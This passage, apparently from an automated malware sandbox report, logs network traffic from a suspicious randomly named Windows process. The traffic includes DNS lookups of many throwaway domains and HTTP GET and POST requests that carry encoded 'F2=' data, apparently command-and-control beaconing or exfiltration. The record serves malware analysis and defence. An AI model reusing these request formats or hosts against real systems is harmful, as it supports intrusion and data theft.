                                                                      Nov 7, 2024 15:29:06.454541922 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.454569101 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.566348076 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.566361904 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.566416025 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.566472054 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.566514969 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:07.287633896 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.306881905 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.311841965 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:08.311944962 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.320657969 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.325474977 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004515886 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004534960 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004548073 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004559040 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004573107 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004585028 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004599094 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004611969 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004729033 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.004729986 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.004838943 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004978895 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.005354881 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.011265039 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.011277914 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.011291981 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.011444092 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.123228073 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.123262882 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.123276949 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.123337030 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.123502016 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.128911018 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.134144068 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:14.376620054 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:14.382113934 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:14.382174015 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:14.395114899 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:14.400079966 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:14.988385916 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:14.989018917 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:15.896706104 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:15.901813984 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:16.915725946 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:16.920605898 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:16.920878887 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:16.931986094 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:16.937261105 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:17.519298077 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:17.523089886 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:18.443485975 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:18.448491096 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:19.462199926 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:19.467170954 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:19.467308044 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:19.478890896 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:19.484260082 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:19.484276056 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:20.065169096 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:20.065289974 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:20.990864992 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:20.995915890 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:22.009634018 CET5000180192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:22.014641047 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:22.014712095 CET5000180192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:22.023922920 CET5000180192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:22.028737068 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:23.075236082 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:23.075258970 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:23.075272083 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:23.075546980 CET5000180192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:23.076879978 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:23.078005075 CET5000180192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:23.081485033 CET5000180192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:23.086813927 CET8050001208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:28.563721895 CET5000280192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:28.568684101 CET8050002156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:28.568766117 CET5000280192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:28.585345984 CET5000280192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:28.590223074 CET8050002156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:29.814290047 CET8050002156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:29.814342976 CET5000280192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:30.099824905 CET5000280192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:30.105889082 CET8050002156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:31.162336111 CET5000380192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:31.167571068 CET8050003156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:31.171025038 CET5000380192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:31.204077959 CET5000380192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:31.209076881 CET8050003156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:32.709103107 CET5000380192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:32.757451057 CET8050003156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:33.843003988 CET5000480192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:33.848824978 CET8050004156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:33.848897934 CET5000480192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:33.862226009 CET5000480192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:33.867347002 CET8050004156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:33.867641926 CET8050004156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:35.365442991 CET5000480192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:35.413463116 CET8050004156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:36.385404110 CET5000580192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:36.390419006 CET8050005156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:36.390486002 CET5000580192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:36.401371002 CET5000580192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:36.406176090 CET8050005156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:39.657581091 CET8050003156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:39.659070969 CET5000380192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:42.328870058 CET8050004156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:42.329005957 CET5000480192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:44.886280060 CET8050005156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:44.886986017 CET5000580192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:44.890872002 CET5000580192.168.2.8156.242.132.82
                                                                      Nov 7, 2024 15:29:44.896178007 CET8050005156.242.132.82192.168.2.8
                                                                      Nov 7, 2024 15:29:58.048017979 CET5000680192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:29:58.052875996 CET805000684.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:29:58.052994967 CET5000680192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:29:58.063930988 CET5000680192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:29:58.068798065 CET805000684.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:29:58.903561115 CET805000684.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:29:58.903671026 CET5000680192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:30:00.756079912 CET5000680192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:30:00.761600971 CET805000684.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:30:01.774868965 CET5000780192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:30:01.779859066 CET805000784.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:30:01.783004045 CET5000780192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:30:01.793606043 CET5000780192.168.2.884.32.84.32
                                                                      Nov 7, 2024 15:30:01.798599005 CET805000784.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:30:02.614403009 CET805000784.32.84.32192.168.2.8
                                                                      Nov 7, 2024 15:30:02.614463091 CET5000780192.168.2.884.32.84.32

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 7, 2024 15:27:36.892687082 CET5664353192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:27:36.918123960 CET53566431.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:27:52.634691000 CET5997553192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:27:52.677510977 CET53599751.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:06.012183905 CET6161053192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:06.024117947 CET53616101.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:19.400434971 CET5893653192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:19.424321890 CET53589361.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:32.790978909 CET5147053192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:33.802906990 CET5147053192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:34.802881002 CET5147053192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:36.050856113 CET53514701.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:36.050872087 CET53514701.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:36.050909996 CET53514701.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:38.073407888 CET5221253192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:39.084252119 CET5221253192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:40.100140095 CET5221253192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:41.079432964 CET53522121.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:41.079451084 CET53522121.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:41.079471111 CET53522121.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:28:47.135505915 CET4969553192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:28:47.149298906 CET53496951.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:29:00.494671106 CET5220353192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:29:00.658840895 CET53522031.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:29:14.147852898 CET5707153192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:29:14.373718977 CET53570711.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:29:28.088310957 CET6350653192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:29:28.555385113 CET53635061.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:29:49.901207924 CET6475053192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:29:49.918687105 CET53647501.1.1.1192.168.2.8
                                                                      Nov 7, 2024 15:29:57.979041100 CET5287453192.168.2.81.1.1.1
                                                                      Nov 7, 2024 15:29:58.045125961 CET53528741.1.1.1192.168.2.8

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 7, 2024 15:27:36.892687082 CET192.168.2.81.1.1.10xb794Standard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:27:52.634691000 CET192.168.2.81.1.1.10x11bcStandard query (0)www.falconclub.onlineA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:06.012183905 CET192.168.2.81.1.1.10xa96eStandard query (0)www.promasterev.shopA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:19.400434971 CET192.168.2.81.1.1.10x9f74Standard query (0)www.childlesscatlady.todayA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:32.790978909 CET192.168.2.81.1.1.10x565aStandard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:33.802906990 CET192.168.2.81.1.1.10x565aStandard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:34.802881002 CET192.168.2.81.1.1.10x565aStandard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:38.073407888 CET192.168.2.81.1.1.10x1e96Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:39.084252119 CET192.168.2.81.1.1.10x1e96Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:40.100140095 CET192.168.2.81.1.1.10x1e96Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:47.135505915 CET192.168.2.81.1.1.10x97c0Standard query (0)www.doggieradio.netA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:00.494671106 CET192.168.2.81.1.1.10x727aStandard query (0)www.demovix.xyzA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:14.147852898 CET192.168.2.81.1.1.10x9115Standard query (0)www.palcoconnector.netA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:28.088310957 CET192.168.2.81.1.1.10x86cbStandard query (0)www.shanhaiguan.netA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:49.901207924 CET192.168.2.81.1.1.10x7efbStandard query (0)www.mtcep.orgA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:57.979041100 CET192.168.2.81.1.1.10x4975Standard query (0)www.es-lidl.onlineA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 7, 2024 15:27:36.918123960 CET1.1.1.1192.168.2.80xb794No error (0)www.multileveltravel.worldmultileveltravel.worldCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 7, 2024 15:27:36.918123960 CET1.1.1.1192.168.2.80xb794No error (0)multileveltravel.world3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:27:36.918123960 CET1.1.1.1192.168.2.80xb794No error (0)multileveltravel.world15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:27:52.677510977 CET1.1.1.1192.168.2.80x11bcNo error (0)www.falconclub.online74.208.236.25A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:06.024117947 CET1.1.1.1192.168.2.80xa96eNo error (0)www.promasterev.shoppromasterev.shopCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:06.024117947 CET1.1.1.1192.168.2.80xa96eNo error (0)promasterev.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:06.024117947 CET1.1.1.1192.168.2.80xa96eNo error (0)promasterev.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:19.424321890 CET1.1.1.1192.168.2.80x9f74No error (0)www.childlesscatlady.todaychildlesscatlady.todayCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:19.424321890 CET1.1.1.1192.168.2.80x9f74No error (0)childlesscatlady.today3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:19.424321890 CET1.1.1.1192.168.2.80x9f74No error (0)childlesscatlady.today15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:36.050856113 CET1.1.1.1192.168.2.80x565aServer failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:36.050872087 CET1.1.1.1192.168.2.80x565aServer failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:36.050909996 CET1.1.1.1192.168.2.80x565aServer failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:41.079432964 CET1.1.1.1192.168.2.80x1e96Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:41.079451084 CET1.1.1.1192.168.2.80x1e96Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:41.079471111 CET1.1.1.1192.168.2.80x1e96Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:47.149298906 CET1.1.1.1192.168.2.80x97c0No error (0)www.doggieradio.netdoggieradio.netCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:47.149298906 CET1.1.1.1192.168.2.80x97c0No error (0)doggieradio.net3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:28:47.149298906 CET1.1.1.1192.168.2.80x97c0No error (0)doggieradio.net15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:00.658840895 CET1.1.1.1192.168.2.80x727aNo error (0)www.demovix.xyz199.192.19.19A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:14.373718977 CET1.1.1.1192.168.2.80x9115No error (0)www.palcoconnector.net208.91.197.27A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:28.555385113 CET1.1.1.1192.168.2.80x86cbNo error (0)www.shanhaiguan.net156.242.132.82A (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:49.918687105 CET1.1.1.1192.168.2.80x7efbName error (3)www.mtcep.orgnonenoneA (IP address)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:58.045125961 CET1.1.1.1192.168.2.80x4975No error (0)www.es-lidl.onlinees-lidl.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 7, 2024 15:29:58.045125961 CET1.1.1.1192.168.2.80x4975No error (0)es-lidl.online84.32.84.32A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.multileveltravel.world
                                                                      • www.falconclub.online
                                                                      • www.promasterev.shop
                                                                      • www.childlesscatlady.today
                                                                      • www.doggieradio.net
                                                                      • www.demovix.xyz
                                                                      • www.palcoconnector.net
                                                                      • www.shanhaiguan.net
                                                                      • www.es-lidl.online

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.8497103.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:27:36.937261105 CET492OUTGET /hfue/?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.multileveltravel.world
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:27:37.581988096 CET404INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:27:37 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 48 53 3d 35 34 33 68 41 70 77 48 44 26 46 32 3d 47 7a 46 33 6f 37 65 7a 61 31 64 55 34 46 34 37 36 63 48 48 65 72 61 6c 2f 63 59 4a 47 2b 46 43 77 67 4a 4d 49 7a 30 48 50 6c 66 72 53 43 4d 42 44 56 75 51 66 6a 47 4e 6d 78 42 64 37 6d 6f 56 72 68 43 47 59 32 68 59 37 4d 43 67 4b 2b 4d 6e 65 6b 67 73 39 44 74 71 6d 67 31 69 66 2b 6f 49 6c 36 35 42 6f 70 79 62 48 4c 41 44 55 36 38 69 66 31 6f 57 4b 46 6d 71 45 4e 61 62 44 45 37 30 4d 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA=="}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.84971274.208.236.25805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:27:52.695770025 CET756OUTPOST /sld7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.falconclub.online
                                                                      Origin: http://www.falconclub.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.falconclub.online/sld7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4d 4c 6b 63 4b 68 4d 35 55 4d 6b 47 6c 34 47 46 4d 42 41 59 53 66 6c 65 70 4e 31 36 66 36 35 5a 55 34 52 6d 44 71 6f 3d
                                                                      Data Ascii: F2=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bMLkcKhM5UMkGl4GFMBAYSflepN16f65ZU4RmDqo=
                                                                      Nov 7, 2024 15:27:53.493556976 CET580INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 07 Nov 2024 14:27:53 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.84971374.208.236.25805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
